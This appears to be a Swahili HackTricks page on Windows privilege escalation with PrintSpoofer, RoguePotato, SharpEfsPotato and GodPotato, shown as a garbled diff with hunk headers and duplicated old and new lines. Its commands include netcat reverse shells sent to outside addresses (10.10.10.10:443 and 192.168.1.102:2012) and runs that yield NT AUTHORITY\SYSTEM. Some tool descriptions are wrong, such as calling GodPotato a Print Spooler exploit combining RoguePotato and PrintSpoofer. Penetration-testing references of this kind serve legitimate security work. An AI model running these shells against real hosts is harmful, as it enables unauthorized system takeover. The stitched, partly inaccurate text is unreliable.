* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato haifanyi kazi** kwenye Windows Server 2019 na Windows 10 toleo la 1809 na baadaye. Walakini, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) inaweza kutumika kuchukua nafasi sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`. Chapisho hili la blogu linatoa maelezo ya kina juu ya zana ya `PrintSpoofer`, ambayo inaweza kutumika kudhulumu mamlaka za udanganyifu kwenye mwenyeji wa Windows 10 na Server 2019 ambapo JuicyPotato haifanyi kazi tena.
**JuicyPotato haitumiki** kwenye Windows Server 2019 na Windows 10 toleo la 1809 na baadaye. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) inaweza kutumika kwa **kutumia haki sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`**. Chapisho hili la blogu linachunguza kwa undani zana ya `PrintSpoofer`, ambayo inaweza kutumika kudhuru haki za uigaji kwenye mwenyeji wa Windows 10 na Server 2019 ambapo JuicyPotato haifanyi kazi tena.
{% endhint %}
## Onyesho Rahisi
## Onyesho Haraka
### PrintSpoofer
```bash
@ -43,32 +57,9 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
{% code %}
{% endcode %}
### SharpEfsPotato
SharpEfsPotato ni zana ya uchomaji ya Windows ambayo inaweza kutumiwa kutekeleza shambulio la kusudi la kusudi (LPE) kwenye mfumo wa Windows. Zana hii inatumia udhaifu katika mchakato wa kusindika faili ya EFS (Encrypting File System) ili kujipatia mamlaka ya juu ya mfumo.
#### Jinsi Inavyofanya Kazi
SharpEfsPotato inafanya kazi kwa kuchanganya udhaifu katika mchakato wa kusindika faili ya EFS na udhaifu katika mchakato wa kusindika faili ya COM (Component Object Model). Kwa kufanya hivyo, inaweza kutekeleza shambulio la kusudi la kusudi na kujipatia mamlaka ya juu ya mfumo.
#### Jinsi ya Kutumia SharpEfsPotato
1. Pakua na usakinishe zana ya SharpEfsPotato kwenye mfumo wako wa Windows.
2. Fungua terminal na endesha zana kwa kutumia amri ifuatayo:
```
SharpEfsPotato.exe
```
3. Zana itajaribu kutekeleza shambulio la kusudi la kusudi na kujipatia mamlaka ya juu ya mfumo. Ikiwa shambulio linafanikiwa, utapata mamlaka ya juu ya mfumo.
#### Tahadhari
Ni muhimu kutambua kuwa kutumia SharpEfsPotato ni kinyume cha sheria na inaweza kusababisha madhara makubwa. Ni muhimu kuzingatia sheria na kufanya shughuli za uchomaji tu kwa idhini sahihi na kwa madhumuni halali.
{% endcode %}
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
@ -89,25 +80,7 @@ nt authority\system
```
### GodPotato
GodPotato ni mbinu ya kufanya uchomaji wa kawaida wa kijijini kwa kutumia udhaifu katika huduma ya Print Spooler ya Windows. Mbinu hii inaruhusu mtumiaji mwenye ruhusa ya chini kutekeleza amri kwa kiwango cha juu cha ruhusa.
#### Jinsi ya Kutumia GodPotato
1. Pakua GodPotato kutoka kwenye uhifadhi wa GitHub.
2. Weka faili ya GodPotato kwenye mfumo wa lengo.
3. Fungua terminal na endesha amri ifuatayo: `.\GodPotato.exe -c "amri_ya_kutekeleza"`.
4. Amri itatekelezwa kwa kiwango cha juu cha ruhusa.
#### Kuzuia GodPotato
Ili kuzuia shambulio la GodPotato, unaweza kufuata hatua zifuatazo:
1. Lemaza huduma ya Print Spooler ikiwa haifai kwa mfumo wako.
2. Hakikisha mfumo wako una sasisho za usalama za hivi karibuni.
3. Fuatilia na angalia mara kwa mara mabadiliko yoyote katika mfumo wako.
4. Tumia ufumbuzi wa usalama uliopendekezwa na wauzaji wa mfumo wako.
Kwa kufuata hatua hizi, unaweza kuzuia shambulio la GodPotato na kuhakikisha usalama wa mfumo wako.
GodPotato ni mchanganyiko wa RoguePotato na PrintSpoofer. Inatumia PrintSpoofer kuchapisha kwa printer ya uongo na kisha kutumia RoguePotato kutekeleza amri ya mfumo kwa kutumia uchapishaji wa printer ya uongo. Hii inaweza kusababisha kupanda kwa mamlaka kwenye mfumo.
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
@ -119,16 +92,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>